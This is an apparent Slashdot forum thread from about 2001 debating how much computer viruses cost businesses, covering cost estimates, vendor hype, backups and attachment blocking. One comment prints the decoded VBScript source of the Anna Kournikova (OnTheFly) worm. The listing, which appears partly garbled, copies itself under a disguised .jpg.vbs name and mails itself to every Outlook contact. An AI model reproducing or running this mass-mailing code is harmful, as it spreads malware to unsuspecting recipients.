The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the forseeable future, I'm happy with what I can do to prevent these from affecting us.

So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".

- -Josh Turiel

Not much $$$ for us.. (2)

MikeFM (12491) | more than 13 years ago | (#437199)

Most of our machines run Linux so does are automaticlly virus free. We also use MacOS and Windows which we keep updated with the latest virus scanners. Given that these updates are available for free online and can be automated the cost isn't much. Due to some problems with our old software working under Windows 2000 we've had to switch to Outlook for mail and I feel that may increase our problems but so far it's been nothing big. I'm considering setting up virus scanning at the mail server level (runs Linux) to take care of that problem but that takes very little effort. I'd say viruses cost maybe $100 in upkeep and monitoring a year.

Other stats. (2)

Matt2000 (29624) | more than 13 years ago | (#437203)

While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?

These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.

Re:Stupidity (2)

Tackhead (54550) | more than 13 years ago | (#437212)


The frightening thing to me - how the hell does McAfee get the data that makes up the map?

If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.

Sounds like a privacy/security nightmare.

Re:Caution: Anecdotal evidence (2)

technos (73414) | more than 13 years ago | (#437218)

This one is a harmless worm. Polite even. It even sets a registry flag so it won't run more than once.

Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.

I don't understand (2)

Pfhreakaz0id (82141) | more than 13 years ago | (#437219)

If you have to run outlook, put outlook in the restricted zone. Set restricted zone to turn off, activex, javascript, java, etc.... Don't open attachments that look fishy. I've done these two things and have never gotten a virus (except for once when some other idiot ran an attachement which infected files on network server, and I got the file, but my virus checker caught that and cleaned it up).

And Then... (2)

Greyfox (87712) | more than 13 years ago | (#437220)

The people who care for the systems come and do a reinstall at $60 to $120 an hour. What's a typical system load for Windows (It was solid 8 hours for OS/2 back when I was doing onsite support.)

What, you mean like... (2)

Greyfox (87712) | more than 13 years ago | (#437221)

The Q Virus [] ?

Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.

Typically I'd have to say the numbers are wrong. (2)

haystor (102186) | more than 13 years ago | (#437224)

The numbers I most often see go something along these lines: If a company sells $10million a day, and it gets knocked offline for 6 hours they will say they lost $2.5million. Of course this doesn't take into account shifting revenue to that time beyond the actual outage. This is more applicable to a DDOS attack, but companies seem like to latch onto big numbers using simple math.

The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.

The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).

Simple Math... (2)

jonfromspace (179394) | more than 13 years ago | (#437230)

1 quarter to call someone who cares for each infected system.

According to the New McCafee Virus Map:

Luvbug.vbs infected
So, 10,000x$0.25 = $2500.00/day

Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...

Re:Simple Math... (2)

jonfromspace (179394) | more than 13 years ago | (#437231)

ARGH! Slashcode ate my less-than symbol...

above should read less than 10,000 infected systems

Re:How to Calculate Actual Cost (2)

ocbwilg (259828) | more than 13 years ago | (#437236)

So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?

Re:I think...Marketing of fear=sales (2)

ocbwilg (259828) | more than 13 years ago | (#437237)

I agree. An intelligent user who is familiar with precautions against virii will probably never be infected. Out of the 10+ years that I've been using MS OS's, I've only ever had a virus once. And that was long ago when a roommate of mine was bring home disks from work and using them on my PC. If you take reasonable precautions, you will be safe.

Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around it's neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by out AV response team that morning!

People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.

Hidden cost (2)

joecool12321 (313452) | more than 13 years ago | (#437240)

I think the costs are higher than corporations are willing to admit. I don't know about virus' specificly, but in "Information Warfare" by Winn Schwartau (I think I spelled his last name correctly) he talks about the damage bugs in general do to business. If they admited to the public that there were such problems, their stock integrity would drop drastically.

Why virus cost companies so much (2)

PureInsanity (315351) | more than 13 years ago | (#437241)

Total damage caused by virus: 1 million dollars Total money spent on people to access cost of virus damage: 16 million dollars.

Re:The real cost of viruses... (3)

MosesJones (55544) | more than 13 years ago | (#437243)

What complete tosh.

Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.

Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.

Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".

I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.

Is that supposed to be funny? (3)

SnakeStu (60546) | more than 13 years ago | (#437244)

This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.

So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.

Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!

Also, you're grossly simplifying the value of restoring from backup and the resulting lack of damage. How "regular" can your backups be before the backup processes interfere with getting the job done? And assuming you're not continuously backing up every keystroke (or other data input or manipulation) as it occurs, there will be data loss between the most recent backup and the time of restoration. Backups are important, but they're not a perfect, complete solution.

There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

I wish that made sense even from a twisted perspective, but it doesn't. I keep hoping this is a joke, but I see it moderated as "Informative" which is a pretty scary thing to consider. Yes, delays in work exist due to phone calls, etc., but to imply that adding more delays has no impact is like saying 1 plus 1 equals 1.

And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

At last, something I can agree with -- the total cost of the Sys Admin's salary shouldn't be attributed to virus recovery. I'm glad you put "total" in your statement, because otherwise we'd be right back to the apparently-facetious claim that adding labor does not add cost.

Generally speaking, I think virus cost estimates are unreliable eye candy for bored newspeople and anti-virus software vendors. Bigger numbers equal bigger revenue for them, whether through audience attention or software sales. They're eye candy to virus authors too, for that sense of "accomplishment." Actual costs are probably impossible to ascertain and are thus a worthless goal of analysis. It's like putting a specific dollar figure on the earthquake in India -- hey, does the exact damage really matter, or should we just do what we can to help the survivors recover?

Personal estimate.. (3)

technos (73414) | more than 13 years ago | (#437245)

We've got a few thousand users in fifteen countries. If all infections were like todays spat of VBS/SST.Worm, it'd cost us more money to find the yearly cost than the cost itself.

But we do tend to get a nasty one about once a year. Win/CIH, ILUVYOU, etc. License costs of all the various scanners runs five figures. Planning, annoying the users to update their definition files, installing the software adds on cost as well.

Quick fudging says the actual expended cost per user, per year is under $25. (Probably closer to $18, but I'll go high to be safe) Now, if we assume there are 200 million computers in business use in the US, (Once again, high and safe) I only get $5 billion.

Either the rest of the companies out there are doing a bad job preparing for viruses and a bad job dealing with them, or the $12.1 figure was just pulled out of someones ass.

Caution: Anecdotal evidence (3)

rkent (73434) | more than 13 years ago | (#437246)

Well, I haven't conducted a thorough study throughout the organization, but we *just* got hit by the Anna Kournikova virus, and here's about what happened:
  • I saw 10 messages with the same subject arrive from 10 different people, and said "hmm, a virus, I think I'll delete them."
  • A bunch of other people noticed the same thing, and started yelling over the cubes, "Hey, there's a virus going around, delete it and don't open it!"
  • Everyone did.

So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!

But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.

Re:The real cost of viruses... (3)

update() (217397) | more than 13 years ago | (#437251)

Hmm...what you're saying is that viruses shouldn't cost you anything because full backups should be instantly available. That's true, but the fact is that they aren't. For one thing, when a virus spreads during the day (which it will) that day's work is lost as you go back to the previous night's backup, or the one before that, to be on the safe side. And that's the best case scenario -- I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

Hey, street crime wouldn't cost anything if people all stayed inside.

Stupidity (3)

clinko (232501) | more than 13 years ago | (#437252)

This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
Basically A map of stupidity...
Is Your State Stupid? []

viruses cost me my sanity (3)

omega_rob (246153) | more than 13 years ago | (#437253)

I don't think I've personally lost much in the way of time or effort as a result of a virus, although I've seen my employer get burned a few times (notably with the "I Love You" bug).

Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.

I bet you all have this same guy working in your office. Admit it, it's probably you.

omega_rob -- friend of the bonsai kitten

How could it *not* cost a lot of money? (3)

Ben Schumin (312122) | more than 13 years ago | (#437254)

If you don't understand how this could cost money, you've obviously never worked in a large corporate environment. An example, a company I worked at got an email vbs "virus" recently. Let's count out where the money comes from.
  • Thousands of users receive thousands of messages in their email box.
  • MIS has to go to 'infected' machines and clean each of them.
  • MIS has less time to address other important issues, blocking other people from completing tasks.
  • While MIS is fixing a machine, that user is less productive, if not completely unproductive.
  • Some users have unbacked up important data on their machines. This data can be destroyed. If someone worked on a project for two days, you're talking 16 hours of paid work lost completely. Multiply this across the entire organization.
  • Prevention costs: Site licenses or per user licenses for virus scanning solutions are expensive and rarely catch new vbs viruses.
  • Small businesses are also hit hard, because often there is no one at the location who has aclue what to do about the problem, so they have to hire some overpriced consultant to run a virus scan and clean their machines for them.

It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.

"Loss" == "IRS allows you to write it off". (4)

Anonymous Coward | more than 13 years ago | (#437255)

I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.

Therefore things like software piracy, virus attacks, are not losses.

Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.

If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.

The real cost of viruses... (4)

jd (1658) | more than 13 years ago | (#437256) zero.

The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.

This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

Something to keep in mind... (4)

dmuth (14143) | more than 13 years ago | (#437257)

Is that getting accurate figures, at least from anti-virus companies/agencies, is going to be difficult. After all, the more serious they play out the problem to be, the more people are going to buy their products.

Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected [] , which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.



What does reputation cost? (4)

Ralph Wiggam (22354) | more than 13 years ago | (#437258)

A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.


Re:Stupidity (4)

Tower (37395) | more than 13 years ago | (#437259)

Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.

OnTheFly Source (4)

zootie (190797) | more than 13 years ago | (#437262)

I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string

'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolde r(0)& "\AnnaKournikova.jpg.vbs"
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
end if
if month(now) =1 and day(now) =26 then "Http://",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
End If
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
End If
end if
End Function
'Vbswg 1.50b

It can cost a lot... (5)

NetJunkie (56134) | more than 13 years ago | (#437263)

It can cost a lot when a business gets hit hard by a virus..but it shouldn't.

Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.

As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.

If you're not blocking .vbs files TODAY, you need to be asking why not.

Virus cost: (5)

SpanishInquisition (127269) | more than 13 years ago | (#437264)

Windows ME sells for 169.99 at

How much do virus *myths* cost businesses? (5)

tenzig_112 (213387) | more than 13 years ago | (#437265)

That's the real question.

As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.

argh! []

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?